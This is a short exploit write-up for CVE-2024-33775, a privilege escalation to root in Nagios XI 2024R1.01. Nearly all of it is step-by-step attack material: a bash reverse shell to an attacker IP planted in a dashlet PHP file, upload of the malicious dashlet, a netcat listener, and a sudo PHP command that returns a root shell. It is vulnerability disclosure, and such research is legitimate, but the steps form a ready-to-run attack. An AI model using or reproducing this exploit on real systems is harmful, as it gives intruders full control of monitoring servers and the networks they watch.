CVE Discovered by: K. Wahab (Neo`X)
- Product: Nagios XI Version 2024R1.01
- Vulnerability: Privilege Escalation from Users "NAGIOS" or "APACHE"
- Result: Full root access on the target system
- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33775
RSS Dashlet is used in this example.
- You can download the Nagios XI Version 2024R1.01 OVA file from: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova
- Add inside dashlet .inc.php file in "/usr/local/nagiosxi/html/includes/dashlets/" the following content :
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
- Start a Netcat listening server on the attacker machine:
nc -nlvp 4441
- Execute the following command to escalate privileges and receive a connection as root:
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
-
Go on the "dashlets" managing page and download a Dashlet:
http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet -
Modify the *.inc.php:
exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");
- Start a Netcat listening server on the attacker machine:
nc -nlvp 4441
- Upload the malicious dashlet in the dashlets managing page and wait for connection as APACHE user.
- Execute the following command to escalate privileges and receive a connection as root:
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
(Note : After executing the command you will receive connection as APACHE, use CTRL+C to exit and restart listener again multiple times)
